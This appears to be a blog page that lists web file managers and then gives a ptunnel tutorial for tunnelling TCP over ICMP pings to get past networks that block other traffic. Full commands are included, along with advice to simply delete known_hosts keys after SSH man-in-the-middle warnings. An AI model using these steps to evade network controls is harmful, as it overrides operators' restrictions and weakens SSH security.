• Browse and Extract ZIP files online

4.Relay -Ajax directory manager

Relay is a Ajax based free File Manager for the web that allows you to (pre)view of thumbnail including pdf, upload and modify files and folders via the browser.

Relay -Ajax directory manager compatible with ;

• PHP version 4+
• MySQL version 4+
• Perl 5.8.0 (for upload progress)
• Apache/IIS

Features :

• easily drag-n-drop files and folders
• dynamic loading file structure
• dynamic upload progress bar
• thumbnail preview, including pdf
• multiple users & accounts for sharing

5. fileNice

filenice is free php file browser , filenice Basically useful for if you have a ‘dump’ folder on your server where you regularly upload files and you want to be able to see what’s there.

Features:

• Source viewing of code
• Preference based sorting
• Search
• Folder comments
• easy and quickly Send to Flickr
• preview about File details
• Folder specific slideshows of images without reloading pages.

6.phpXplorer

phpXplorer is an open source file management system written in PHP. It enables you to work on a remote file system through a web browser. By default it has got dialogs for editing HTML, PHP, image, Apache, compressed and email files. Its modular design makes it easy to build your own filetypes, property sheets, views and themes.

7.FileVista

FileVista is a web file manager for storing, managing and sharing files online through your web browser. It is a web based software which you install on your web server to fulfill web file management requirements of your company or organization. This web file manager allows your users to upload, download and organize any type of file with an intuitive user interface.

8.FileMan

FileMan help you to quickly and easily access your website’s files and directories through any compatible browser. You can perform many tasks including creating and editing html files using a WYSIWYG editor, uploading one or multiple files with ascii/binary transfer capability, searching for files based on file names or full text searches, replacing files, and much much more.

9.CKFinder

CKFinder is a powerful and easy to use Ajax file manager for web browsers. Its user-friendly interface makes it him intuitive and quick to learn for all kinds of users, from advanced professionals to Internet beginners.

Features:

• Full source code included for the server side integration.
• secure file uploads.
• quickly responses without refreshing page.
• Lightweight and user-friendly interface .
• Full user control: create, rename and delete folders and files.
• Multi-language support with automatic user language detection.
• Quality image thumbnails, making it quick to find things.
• Folders tree navigation: for easy to navigate .

10.FileRun

FileRun is a web-based (PHP) file management system that allows you to manage files stored on your web server, through an innovative user-friendly (Ajax) interface. fileRun is 100% web based (PHP) file management system, a browser is the only thing a user will need for sending and receiving files .
There’s nothing to download; you can easily access your documents or files from any computer with an Internet connection and a standard browser.

Features:

• user-friendly Ajax interface
• Download folders by zipping them on the fly!
• Uploads folders (without having to Zip and Unzip them).
• unlimited space for Uploads files of unlimited sizes, overcoming PHP upload limitation configuration directives.
• Easily manage files already existing in the file-system (No import required!).

Access Network When Everything Else is Blocked Using ptunnel

Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. At first glance, this might seem like a rather useless thing to do, but it can actually come in handy in some cases. The following example illustrates the main motivation in creating ptunnel:

Setting: You’re on the go, and stumble across an open wireless network. The network gives you an IP address, but won’t let you send TCP or UDP packets out to the rest of the internet, for instance to check your mail. What to do? By chance, you discover that the network will allow you to ping any computer on the rest of the internet. With ptunnel, you can utilize this feature to check your mail, or do other things that require TCP.

Ptunnel Features

Ptunnel is not a feature-rich tool by any means, but it does what it advertises. So here is what it can do:

Tunnel TCP using ICMP echo request and reply packets
Connections are reliable (lost packets are resent as necessary)
Handles multiple connections
Acceptable bandwidth (150 kb/s downstream and about 50 kb/s upstream are the currently measured maximas for one tunnel, but with tweaking this can be improved further)
Authentication, to prevent just anyone from using your proxy

Install Ptunnel in Debian

First you need to edit /etc/apt/sources.list file

#vi /etc/apt/sources.list

add the following lines

deb http://www.cti.ecp.fr/~beauxir5/debian binary/
deb-src http://www.cti.ecp.fr/~beauxir5/debian source/

Update the source list using the following command

#apt-get update

Install ptunnel using the following command

#apt-get install ptunnel

Using ptunnel

Client:

./ptunnel -p [proxy address] -lp [listen port] -da [destination address] -dp [destination port] [-c network device] [-v verbosity] [-f logfile] [-u] [-x password]

Proxy:

./ptunnel [-c network device] [-v verbosity] [-f logfile] [-u] [-x password]

The -p switch sets the address of the host on which the proxy is running. A quick test to see if the proxy will work is simply to try pinging this host — if you get replies, you should be able to make the tunnel work.

The -lp, -da and -dp switches set the local listening port, destination address and destination port. For instance, to tunnel ssh connections from the client machine via a proxy running on proxy.pingtunnel.com to the computer login.domain.com, the following command line would be used:

sudo ./ptunnel -p proxy.pingtunnel.com -lp 8000 -da login.domain.com -dp 22

An ssh connection to login.domain.com can now be established as follows:

ssh -p 8000 localhost

If ssh complains about potential man-in-the-middle attacks, simply remove the offending key from the known_hosts file. The warning/error is expected if you have previously ssh’d to your local computer (i.e., ssh localhost), or you have used ptunnel to forward ssh connections to different hosts.

Of course, for all of this to work, you need to start the proxy on your proxy-computer (we’ll call it proxy.pingtunnel.com here). Doing this is very simple:

sudo ./ptunnel

If you find that the proxy isn’t working, you will need to enable packet capturing on the main network device. Currently this device is assumed to be an ethernet-device (i.e., ethernet or wireless). Packet capturing is enabled by giving the -c switch, and supplying the device name to capture packets on (for instance eth0 or en1). The same goes for the client. On versions of Mac OS X prior to 10.4 (Tiger), packet capturing must always be enabled (both for proxy and client), as resent packets won’t be received otherwise.

To protect yourself from others using your proxy, you can protect access to it with a password using the -x switch. The password is never sent in the clear, but keep in mind that it may be visible from tools like top or ps, which can display the command line used to start an application.

Finally, the -u switch will attempt to run the proxy in unprivileged mode (i.e., no need for root access), and the -v switch controls the amount of output from ptunnel. -1 indicates no output, 0 shows errors only, 1 shows info messages, 2 gives more output, 3 provides even more output, level 4 displays debug info and level 5 displays absolutely everything, including the nasty details of sends and receives. The -f switch allows output to be saved to a logfile.